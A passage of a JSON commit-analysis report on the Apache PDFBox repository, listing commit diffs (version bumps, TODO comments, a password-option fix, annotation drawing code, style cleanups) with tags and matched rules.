"62e41dde57c9caf5598ba365a2816080383757ce" - ], - [ - "no-tag", - "32e458545c32312ee4d73912de159694a012e933" - ] - ], - "tags": [ - "1.2.1" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - } - ] - }, - { - "commit_id": "3ff19bad2c8422f206014e9263f88e0d3136a125", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530726194, - "hunks": 2, - "message": "PDFBOX-3353: add a //TODO git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835074 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "index 0e0985250..ca1a87077 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java", - "@@ -114,2 +114,4 @@ public final class PDAppearanceContentStream extends PDAbstractContentStream imp", - " }", - "+ //TODO shouldn't we set the stack?", - "+ //Or call the appropriate setStrokingColor() method from the base class?", - " }", - "@@ -171,2 +173,4 @@ public final class PDAppearanceContentStream extends PDAbstractContentStream imp", - " }", - "+ //TODO shouldn't we set the stack?", - "+ //Or call the appropriate setNonStrokingColor() method from the base class?", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAppearanceContentStream.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "03938d041c6c6997baf26db65d7bfec5cc2322f4", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529950973, - "hunks": 16, - "message": "[maven-release-plugin] prepare for next development iteration git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834359 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/app/pom.xml b/app/pom.xml", - "index be401960c..8aaf3a7ac 100644", - "--- a/app/pom.xml", - "+++ b/app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11", - "+ 2.0.12-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/debugger-app/pom.xml b/debugger-app/pom.xml", - "index fb0ad541f..387223ebd 100644", - "--- a/debugger-app/pom.xml", - "+++ b/debugger-app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11", - "+ 2.0.12-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/debugger/pom.xml b/debugger/pom.xml", - "index 626d3c719..838ef1541 100644", - "--- a/debugger/pom.xml", - "+++ b/debugger/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11", - "+ 2.0.12-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/examples/pom.xml b/examples/pom.xml", - "index aac6580d2..b0e5ea08d 100644", - "--- a/examples/pom.xml", - "+++ b/examples/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11", - "+ 2.0.12-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/fontbox/pom.xml b/fontbox/pom.xml", - "index 027b01f9f..3da486720 100644", - "--- a/fontbox/pom.xml", - "+++ b/fontbox/pom.xml", - "@@ -23,3 +23,3 @@", - " pdfbox-parent", - "- 2.0.11", - "+ 2.0.12-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/parent/pom.xml b/parent/pom.xml", - "index 745f2286b..c6e94597b 100644", - "--- a/parent/pom.xml", - "+++ b/parent/pom.xml", - "@@ -31,3 +31,3 @@", - " pdfbox-parent", - "- 2.0.11", - "+ 2.0.12-SNAPSHOT", - " pom", - "@@ -429,5 +429,5 @@", - " ", - "- scm:svn:http://svn.apache.org/repos/asf/maven/pom/tags/2.0.11/pdfbox-parent", - "- scm:svn:https://svn.apache.org/repos/asf/maven/pom/tags/2.0.11/pdfbox-parent", - "- http://svn.apache.org/viewvc/maven/pom/tags/2.0.11/pdfbox-parent", - "+ scm:svn:http://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", - "+ scm:svn:https://svn.apache.org/repos/asf/maven/pom/branches/2.0/pdfbox-parent", - "+ http://svn.apache.org/viewvc/maven/pom/branches/2.0/pdfbox-parent", - " ", - "diff --git a/pdfbox/pom.xml b/pdfbox/pom.xml", - "index 5788f62ea..2a7b9ea45 100644", - "--- a/pdfbox/pom.xml", - "+++ b/pdfbox/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11", - "+ 2.0.12-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/pom.xml b/pom.xml", - "index bb5300b5d..9e3654654 100644", - "--- a/pom.xml", - "+++ b/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11", - "+ 2.0.12-SNAPSHOT", - " parent/pom.xml", - "@@ -36,8 +36,8 @@", - " ", - "- scm:svn:http://svn.apache.org/repos/asf/pdfbox/tags/2.0.11", - "+ scm:svn:http://svn.apache.org/repos/asf/pdfbox/branches/2.0", - " ", - " ", - "- scm:svn:https://svn.apache.org/repos/asf/pdfbox/tags/2.0.11", - "+ scm:svn:https://svn.apache.org/repos/asf/pdfbox/branches/2.0", - " ", - "- http://svn.apache.org/viewvc/pdfbox/tags/2.0.11", - "+ http://svn.apache.org/viewvc/pdfbox/branches/2.0", - " ", - "diff --git a/preflight-app/pom.xml b/preflight-app/pom.xml", - "index a8733a59b..3d21e4e67 100644", - "--- a/preflight-app/pom.xml", - "+++ b/preflight-app/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11", - "+ 2.0.12-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/preflight/pom.xml b/preflight/pom.xml", - "index f7eb5a9af..c8f3d5402 100644", - "--- a/preflight/pom.xml", - "+++ b/preflight/pom.xml", - "@@ -28,3 +28,3 @@", - " \t\tpdfbox-parent", - "-\t\t2.0.11", - "+\t\t2.0.12-SNAPSHOT", - " \t\t../parent/pom.xml", - "diff --git a/tools/pom.xml b/tools/pom.xml", - "index 821dff855..b88d6c45a 100644", - "--- a/tools/pom.xml", - "+++ b/tools/pom.xml", - "@@ -25,3 +25,3 @@", - " pdfbox-parent", - "- 2.0.11", - "+ 2.0.12-SNAPSHOT", - " ../parent/pom.xml", - "diff --git a/xmpbox/pom.xml b/xmpbox/pom.xml", - "index 5f8b41f63..88f1ebf75 100644", - "--- a/xmpbox/pom.xml", - "+++ b/xmpbox/pom.xml", - "@@ -29,3 +29,3 @@", - " \t\tpdfbox-parent", - "-\t\t2.0.11", - "+\t\t2.0.12-SNAPSHOT", - " \t\t../parent/pom.xml" - ], - "changed_files": [ - "app/pom.xml", - "debugger-app/pom.xml", - "debugger/pom.xml", - "examples/pom.xml", - "fontbox/pom.xml", - "parent/pom.xml", - "pdfbox/pom.xml", - "pom.xml", - "preflight-app/pom.xml", - "preflight/pom.xml", - "tools/pom.xml", - "xmpbox/pom.xml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "72ebf37cce470d9b62fdab083a57c5c8dbcf1179" - ], - [ - "no-tag", - "3bcd28abd082a19f4a0fca62c513cae791e8fe0c" - ], - [ - "no-tag", - "91ed49cd0fa199e655d68b8b1e6727f636117322" - ], - [ - "no-tag", - "0cc393ca3393c674cbf4fd3813c68b654404d426" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - } - ] - }, - { - "commit_id": "9a882e931950fa9552009cba50fdd30190421518", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528885104, - "hunks": 1, - "message": "PDFBOX-2602: correct password option as suggested by Michael Klink git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833453 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/Decrypt.java b/tools/src/main/java/org/apache/pdfbox/tools/Decrypt.java", - "index e1e6a9288..600ace61d 100644", - "--- a/tools/src/main/java/org/apache/pdfbox/tools/Decrypt.java", - "+++ b/tools/src/main/java/org/apache/pdfbox/tools/Decrypt.java", - "@@ -80,3 +80,3 @@ public final class Decrypt", - " this.alias = commandLine.getOptionValue(ALIAS);", - "- this.password = commandLine.getOptionValue(ALIAS, \"\");", - "+ this.password = commandLine.getOptionValue(PASSWORD, \"\");", - " this.keyStore = commandLine.getOptionValue(KEYSTORE);" - ], - "changed_files": [ - "tools/src/main/java/org/apache/pdfbox/tools/Decrypt.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-2602": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-2602", - "relevance": 2 - } - ] - }, - { - "commit_id": "ec491e841642225089afb694d906104d1fe1e91a", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529692801, - "hunks": 4, - "message": "PDFBOX-3353: support /CrossHairs git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1834152 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index 5424c61b5..a510d19b1 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -59,2 +59,3 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " SUPPORTED_NAMES.add(PDAnnotationText.NAME_RIGHT_POINTER);", - "+ SUPPORTED_NAMES.add(PDAnnotationText.NAME_CROSS_HAIRS);", - " }", - "@@ -138,2 +139,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " break;", - "+ case PDAnnotationText.NAME_CROSS_HAIRS:", - "+ drawCrossHairs(annotation, contentStream);", - "+ break;", - " default:", - "@@ -283,2 +287,5 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.closeAndFillAndStroke();", - "+ ", - "+ // alternatively, this could also be drawn with Zapf Dingbats \"a21\"", - "+ // see DrawStar()", - " }", - "@@ -463,2 +470,24 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - "+ private void drawCrossHairs(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)", - "+ throws IOException", - "+ {", - "+ PDRectangle bbox = adjustRectAndBBox(annotation, 20, 20);", - "+", - "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(0);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.61f); // value from Adobe", - "+", - "+ contentStream.transform(Matrix.getScaleInstance(0.001f * min / 1.5f, 0.001f * min / 1.5f));", - "+ contentStream.transform(Matrix.getTranslateInstance(0, 50));", - "+", - "+ // we get the shape of a Zapf Dingbats right pointer (0x27A4) and use that one.", - "+ // Adobe uses a different font (which one?), or created the shape from scratch.", - "+ GeneralPath path = PDType1Font.SYMBOL.getPath(\"circleplus\");", - "+ addPath(contentStream, path);", - "+ contentStream.fillAndStroke();", - "+ }", - "+", - " private void drawRightArrow(PDAnnotationText annotation, final PDAppearanceContentStream contentStream)" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "cae649aa1663f68e059881a80a03f5c29e7f205f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526732793, - "hunks": 2, - "message": "PDFBOX-3353: move comment to correct class git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831885 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "index bd6eec8d1..87fe22d72 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "@@ -159,15 +159,2 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "-", - "- //TODO line endings (LE) are missing", - "- // How it could be done by reusing some of the code from ", - "- // the Line and StrikeOut handlers", - "- // 1) if the LE is contained in SHORT_STYLES, ", - "- // shorten the first + last arms with \"this weird old trick\"", - "- // used in the StrikeOut handler", - "- // and paint", - "- // 2) do a transform so that first and last arms are imagined flat", - "- // (like in Line handler)", - "- // 3) refactor + reuse the line handler code that draws the ending shapes", - "- // the alternative would be to apply the transform to the LE shapes directly,", - "- // which would be more work and produce code difficult to understand", - " contentStream.drawShape(lineWidth, hasStroke, hasBackground);", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "index edaa06b0a..160f39289 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "@@ -118,2 +118,14 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "+ //TODO line endings (LE) are missing", - "+ // How it could be done by reusing some of the code from ", - "+ // the Line and StrikeOut handlers", - "+ // 1) if the LE is contained in SHORT_STYLES, ", - "+ // shorten the first + last arms with \"this weird old trick\"", - "+ // used in the StrikeOut handler", - "+ // and paint", - "+ // 2) do a transform so that first and last arms are imagined flat", - "+ // (like in Line handler)", - "+ // 3) refactor + reuse the line handler code that draws the ending shapes", - "+ // the alternative would be to apply the transform to the LE shapes directly,", - "+ // which would be more work and produce code difficult to understand", - " cs.stroke();" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "9104a894337130031436ede5a0e4ca237a8c079a", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1522993912, - "hunks": 1, - "message": "PDFBOX-4172: add source code comment for default setting; closes #45 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1828491 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "index 6756eaa08..9735402c4 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java", - "@@ -713,2 +713,4 @@ public final class PDAcroForm implements COSObjectable", - " {", - "+ // a field without specific settings typically needs to be translated", - "+ // to the correct position", - " boolean needsTranslation = true;" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/form/PDAcroForm.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4172": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4172", - "relevance": 2 - } - ] - }, - { - "commit_id": "82f357af52829105e16ff1131bbe967d9f026aa0", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526743526, - "hunks": 1, - "message": "PDFBOX-3353: update //TODO comment because a part was done in previous commit git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831902 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "index fe8ab0b7e..7be318260 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "@@ -151,11 +151,6 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - " //TODO line endings (LE) are missing", - "- // How it could be done by reusing some of the code from ", - "- // the Line and StrikeOut handlers", - "- // 1) if the LE is contained in SHORT_STYLES, ", - "- // shorten the first + last arms with \"this weird old trick\"", - "- // used in the StrikeOut handler", - "- // and paint", - "- // 2) do a transform so that first and last arms are imagined flat", - "- // (like in Line handler)", - "- // 3) refactor + reuse the line handler code that draws the ending shapes", - "+ // How it could be done by reusing some of the code from the line handler", - "+ // 1) do a transform so that first and last \"arms\" are imagined flat", - "+ // (like in line handler)", - "+ // 2) refactor + reuse the line handler code that draws the ending shapes", - " // the alternative would be to apply the transform to the LE shapes directly," - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "6c39d1ee5da76b7d73084ed740514edcd4d6f9b1", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528548809, - "hunks": 2, - "message": "PDFBOX-4071: java coding convention, move private static field before constructor git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833234 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "index 620bb669a..892ea071f 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java", - "@@ -209,2 +209,6 @@ public abstract class BlendMode", - "+ // these maps *must* come after the BlendMode.* constant declarations, otherwise their values would be null", - "+ private static final Map BLEND_MODES = createBlendModeMap();", - "+ private static final Map BLEND_MODE_NAMES = createBlendModeNamesMap();", - "+", - " BlendMode()", - "@@ -382,6 +386,2 @@ public abstract class BlendMode", - "- // these maps *must* come after the BlendMode.* constant declarations, otherwise their values would be null", - "- private static final Map BLEND_MODES = createBlendModeMap();", - "- private static final Map BLEND_MODE_NAMES = createBlendModeNamesMap();", - "-", - " private static Map createBlendModeMap()" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/blend/BlendMode.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "2a3af0e226242c73ea751c3b5a29b13d2a57909e", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1525001894, - "hunks": 2, - "message": "PDFBOX-4189: Missed the last para of the text, by Palash Ray git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830505 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "index a44d464df..d98b9b3c9 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", - "@@ -37,4 +37,4 @@ import org.apache.pdfbox.pdmodel.font.PDType0Font;", - " * \"https://svn.apache.org/viewvc/pdfbox/trunk/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/HelloWorldTTF.java?view=markup\">PdfBox", - "- * Example. This attempts to correctly demonstrate to what extent Bengali text rendering is supported. First, we", - "- * render some text, and then embed an image with the correct text displayed on the next page.", - "+ * Example. This attempts to correctly demonstrate to what extent Bengali text rendering is", - "+ * supported. We read large amount of text from a file and try to render it properly.", - " *", - "@@ -146,2 +146,3 @@ public class BengaliPdfGenerationHelloWorld", - " }", - "+ realignedTexts.add(linesInAPage);", - " return realignedTexts;" - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4189": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4189", - "relevance": 2 - } - ] - }, - { - "commit_id": "984bd528295d4ca79f91abca9b52deacd3bee950", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524835347, - "hunks": 19, - "message": "PDFBOX-3353: fix SonarQube pet peeves, and one of mine too git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830352 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", - "index 19ad102f5..70dd019d2 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", - "@@ -42,2 +42,3 @@ class CloudyBorder", - " private static final double ANGLE_34_DEG = Math.toRadians(34);", - "+ private static final double ANGLE_30_DEG = Math.toRadians(30);", - " private static final double ANGLE_12_DEG = Math.toRadians(12);", - "@@ -226,3 +227,4 @@ class CloudyBorder", - " {", - "- double w = right - left, h = top - bottom;", - "+ double w = right - left;", - "+ double h = top - bottom;", - "@@ -346,3 +348,5 @@ class CloudyBorder", - "- double alpha = array[0], dx = array[1];", - "+ double alpha = array[0];", - "+ double dx = array[1];", - "+", - " double angleCur = Math.atan2(ptNext.y - pt.y, ptNext.x - pt.x);", - "@@ -442,7 +446,6 @@ class CloudyBorder", - " {", - "- final double D = Math.toRadians(30);", - " double a = angleCur + ANGLE_180_DEG;", - "- getArcSegment(a + alpha, a + alpha - D, cx, cy, r, r, null, false);", - "- getArcSegment(a + alpha - D, a + ANGLE_90_DEG, cx, cy, r, r, null, false);", - "+ getArcSegment(a + alpha, a + alpha - ANGLE_30_DEG, cx, cy, r, r, null, false);", - "+ getArcSegment(a + alpha - ANGLE_30_DEG, a + ANGLE_90_DEG, cx, cy, r, r, null, false);", - " getArcSegment(a + ANGLE_90_DEG, a + ANGLE_180_DEG - ANGLE_34_DEG,", - "@@ -474,3 +477,5 @@ class CloudyBorder", - " {", - "- int n = template.length, i = 0;", - "+ int n = template.length;", - "+ int i = 0;", - "+", - " if ((n % 3) == 1)", - "@@ -503,3 +508,6 @@ class CloudyBorder", - "- double rdLeft, rdBottom, rdRight, rdTop;", - "+ double rdLeft;", - "+ double rdBottom;", - "+ double rdRight;", - "+ double rdTop;", - "@@ -577,3 +585,3 @@ class CloudyBorder", - " /**", - "- * Creates one or more Bezier curves that represent an elliptical arc.", - "+ * Creates one or more B\u00c3\u00a9zier curves that represent an elliptical arc.", - " * Angles are in radians.", - "@@ -595,3 +603,4 @@ class CloudyBorder", - " }", - "- double sweep = angleTodo, angleDone = 0;", - "+ double sweep = angleTodo;", - "+ double angleDone = 0;", - "@@ -624,3 +633,3 @@ class CloudyBorder", - " /**", - "- * Creates a single Bezier curve that represents a section of an elliptical", - "+ * Creates a single B\u00c3\u00a9zier curve that represents a section of an elliptical", - " * arc. The sweep angle of the section must not be larger than 90 degrees.", - "@@ -634,6 +643,6 @@ class CloudyBorder", - "- double cos_a = Math.cos(startAng);", - "- double sin_a = Math.sin(startAng);", - "- double cos_b = Math.cos(endAng);", - "- double sin_b = Math.sin(endAng);", - "+ double cosA = Math.cos(startAng);", - "+ double sinA = Math.sin(startAng);", - "+ double cosB = Math.cos(endAng);", - "+ double sinB = Math.sin(endAng);", - " double denom = Math.sin((endAng - startAng) / 2.0);", - "@@ -645,4 +654,4 @@ class CloudyBorder", - " {", - "- double xs = cx + rx * cos_a;", - "- double ys = cy + ry * sin_a;", - "+ double xs = cx + rx * cosA;", - "+ double ys = cy + ry * sinA;", - " if (out != null)", - "@@ -659,8 +668,8 @@ class CloudyBorder", - " double bcp = 1.333333333 * (1 - Math.cos((endAng - startAng) / 2.0)) / denom;", - "- double p1x = cx + rx * (cos_a - bcp * sin_a);", - "- double p1y = cy + ry * (sin_a + bcp * cos_a);", - "- double p2x = cx + rx * (cos_b + bcp * sin_b);", - "- double p2y = cy + ry * (sin_b - bcp * cos_b);", - "- double p3x = cx + rx * cos_b;", - "- double p3y = cy + ry * sin_b;", - "+ double p1x = cx + rx * (cosA - bcp * sinA);", - "+ double p1y = cy + ry * (sinA + bcp * cosA);", - "+ double p2x = cx + rx * (cosB + bcp * sinB);", - "+ double p2y = cy + ry * (sinB - bcp * cosB);", - "+ double p3x = cx + rx * cosB;", - "+ double p3y = cy + ry * sinB;", - "@@ -668,4 +677,4 @@ class CloudyBorder", - " {", - "- double xs = cx + rx * cos_a;", - "- double ys = cy + ry * sin_a;", - "+ double xs = cx + rx * cosA;", - "+ double ys = cy + ry * sinA;", - " if (out != null)", - "@@ -714,2 +723,4 @@ class CloudyBorder", - " // flattened. SEG_CLOSE can be ignored.", - "+ default:", - "+ break;", - " }", - "@@ -740,4 +751,8 @@ class CloudyBorder", - "- double left = leftOrig, bottom = bottomOrig, right = rightOrig, top = topOrig;", - "- double width = right - left, height = top - bottom;", - "+ double left = leftOrig;", - "+ double bottom = bottomOrig;", - "+ double right = rightOrig;", - "+ double top = topOrig;", - "+ double width = right - left;", - "+ 